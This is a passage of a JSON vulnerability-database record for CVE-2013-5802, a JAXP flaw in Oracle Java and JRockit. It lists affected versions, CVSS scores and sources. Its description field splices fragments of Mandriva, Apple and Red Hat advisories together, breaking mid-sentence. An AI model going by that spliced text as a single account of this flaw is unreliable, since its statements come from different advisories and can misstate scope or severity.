[], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1_b06:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update60:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "r27.7.6", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.7.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "r28.2.8", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.2.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.1.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update40:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update60:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-5802" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "124303" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "123722" } ], "trust": 0.4 }, "cve": "CVE-2013-5802", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2013-5802", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2013-5802", "trust": 1.0, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201310-380", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2013-5802", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5802" }, { "db": "CNNVD", "id": "CNNVD-201310-380" }, { "db": "NVD", "id": "CVE-2013-5802" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JAXP. \nThe vulnerability can be exploited over multiple protocols. This issue affects the \u0027JAXP\u0027 sub-component. In a typical operating environment, these are of low\nsecurity risk as the runtime is not used on untrusted applets. \n \n This updates IcedTea6 to version 1.11.14, which fixes these issues,\n as well as several others. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFSiycxmqjQ0CJFipgRAgEDAKDflCdAJCTeaiQlfwCT2ypkKWxMAQCguZqZ\nJVNYykKzXuNiMTc7JATPYjA=\n=20DS\n-----END PGP SIGNATURE-----\n. \n\nBackground\n==========\n\nIcedTea is a distribution of the Java OpenJDK source code built with\nfree build tools. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2013-10-15-1 Java for OS X 2013-005 and\nMac OS X v10.6 Update 17\n\nJava for OS X 2013-005 and Mac OS X v10.6 Update 17 is now available\nand addresses the following:\n\nJava\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\nOS X Lion v10.7 or later, OS X Lion Server v10.7 or later,\nOS X Mountain Lion 10.8 or later\nImpact: Multiple vulnerabilities in Java 1.6.0_51\nDescription: 8011782 Multiple vulnerabilities existed in Java\n1.6.0_51, the most serious of which may allow an untrusted Java\napplet to execute arbitrary code outside the Java sandbox. Further information is available via the Java website at ht\ntp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html\nCVE-ID\nCVE-2013-3829\nCVE-2013-4002\nCVE-2013-5772\nCVE-2013-5774\nCVE-2013-5776\nCVE-2013-5778\nCVE-2013-5780\nCVE-2013-5782\nCVE-2013-5783\nCVE-2013-5784\nCVE-2013-5787\nCVE-2013-5789\nCVE-2013-5790\nCVE-2013-5797\nCVE-2013-5801\nCVE-2013-5802\nCVE-2013-5803\nCVE-2013-5804\nCVE-2013-5809\nCVE-2013-5812\nCVE-2013-5814\nCVE-2013-5817\nCVE-2013-5818\nCVE-2013-5819\nCVE-2013-5820\nCVE-2013-5823\nCVE-2013-5824\nCVE-2013-5825\nCVE-2013-5829\nCVE-2013-5830\nCVE-2013-5831\nCVE-2013-5832\nCVE-2013-5840\nCVE-2013-5842\nCVE-2013-5843\nCVE-2013-5848\nCVE-2013-5849\nCVE-2013-5850\n\n\nJava for OS X 2013-005 and Mac OS X v10.6 Update 17\nmay be obtained from the Software Update pane in System Preferences,\nMac App Store, or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nFor Mac OS X v10.6 systems\nThe download file is named: JavaForMacOSX10.6update17.dmg\nIts SHA-1 digest is: 5dfe7eaebf9726352c97964da61d57fa28246c08\n\nFor OS X Lion and Mountain Lion systems\nThe download file is named: JavaForOSX2013-005.dmg\nIts SHA-1 digest is: ce78f9a916b91ec408c933bd0bde5973ca8a2dc4\n\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2.0.17 (Darwin)\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBAgAGBQJSXYc6AAoJEPefwLHPlZEwD8EP/3aN1h4wIM/BjidF3ZY+PXf3\nLzgtb8yAxh03A+J3NJCd3BKmjINXIo9Wwt9aUTktEz4UefvpF+rIsgKSinotvQt0\nTmtsYPItFgs83Lj2IFBpCLurM+O0fUhje+mvVzR/KA7kHvrtXYRC5w2plWh32Smm\nD4Ejh8odeR0IU3OdWV5MJpcRoRpRySX16JOEJc76SIE0+sbOLHZ90rmzyPMB0S2u\njZRq8qY3DJS9C5De97gh8F/V76fV8Aiq6RwGPs9m+tJUCJe6XLEy8Wq/G3jlKXyr\n+KrradRl9Bz5oTUnVDlN9odoOGZ/J4nq4xs0RyN08uETKcw6315+7UTP3B+hD8IM\n1YyWeceCd8oHtWlR/02spwaku5ctxiUZpqXQ8DxDH3e8dONBfndfmKGUnywQSFd8\nvCgZR0SQgSbhtD/UnNGW9VgJsxKgO4gi17aVD/B9LYmMztsSB+wPkg96uTR6J7yh\n+ogJqYeOGsMvvQd8XY++ig1bhEsfzzauEWnq3G4WG8E+Fep+5RHZewxnhzakapqW\n2z7byXHNXtIP2cxL//DG/x4ed+gAWzKxZyPDPSrltw162mkJk/6mTedtpead4LH8\nOoi4Cf1HMbC9gdRBdtGNWo7EN9kr9rpajuRWjqxT5uTLAgJusKk5UnSO2KJtromy\nLos4PbyC//yRidZKynqx\n=I3n5\n-----END PGP SIGNATURE-----\n. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory pages, listed in the References section. should be restricted package (CORBA, 8025022)\n1053495 - CVE-2014-0410 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053496 - CVE-2014-0415 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053499 - CVE-2013-5889 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053501 - CVE-2014-0417 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (2D)\n1053502 - CVE-2014-0387 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053504 - CVE-2014-0424 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053507 - CVE-2014-0403 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053508 - CVE-2014-0375 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053509 - CVE-2013-5905 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)\n1053510 - CVE-2013-5906 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install)\n1053512 - CVE-2013-5902 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053513 - CVE-2014-0418 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053515 - CVE-2013-5887 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053516 - CVE-2013-5899 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053517 - CVE-2013-5888 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1053518 - CVE-2013-5898 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment)\n1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618)\n1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736)\n1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766)\n1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841)\n1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394)\n1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858)\n1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854)\n1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794)\n1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010)\n1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797)\n1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152)\n1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030)\n1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188)\n1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801)\n1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740)\n1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163)\n1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731)\n1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282)\n1088025 - CVE-2014-2428 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088027 - CVE-2014-2409 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088028 - CVE-2014-0449 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n1088030 - CVE-2014-2401 Oracle JDK: unspecified vulnerability fixed in 5.0u75, 6u75, 7u55 and 8u5 (2D)\n1088031 - CVE-2014-2420 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: java-1.6.0-openjdk security update\nAdvisory ID: RHSA-2013:1505-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2013-1505.html\nIssue date: 2013-11-05\nCVE Names: CVE-2013-3829 CVE-2013-4002 CVE-2013-5772 \n CVE-2013-5774 CVE-2013-5778 CVE-2013-5780 \n CVE-2013-5782 CVE-2013-5783 CVE-2013-5784 \n CVE-2013-5790 CVE-2013-5797 CVE-2013-5802 \n CVE-2013-5803 CVE-2013-5804 CVE-2013-5809 \n CVE-2013-5814 CVE-2013-5817 CVE-2013-5820 \n CVE-2013-5823 CVE-2013-5825 CVE-2013-5829 \n CVE-2013-5830 CVE-2013-5840 CVE-2013-5842 \n CVE-2013-5849 CVE-2013-5850 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.6.0-openjdk packages that fix various security issues are\nnow available for Red Hat Enterprise Linux 5 and 6. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux (v. 5 server) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat 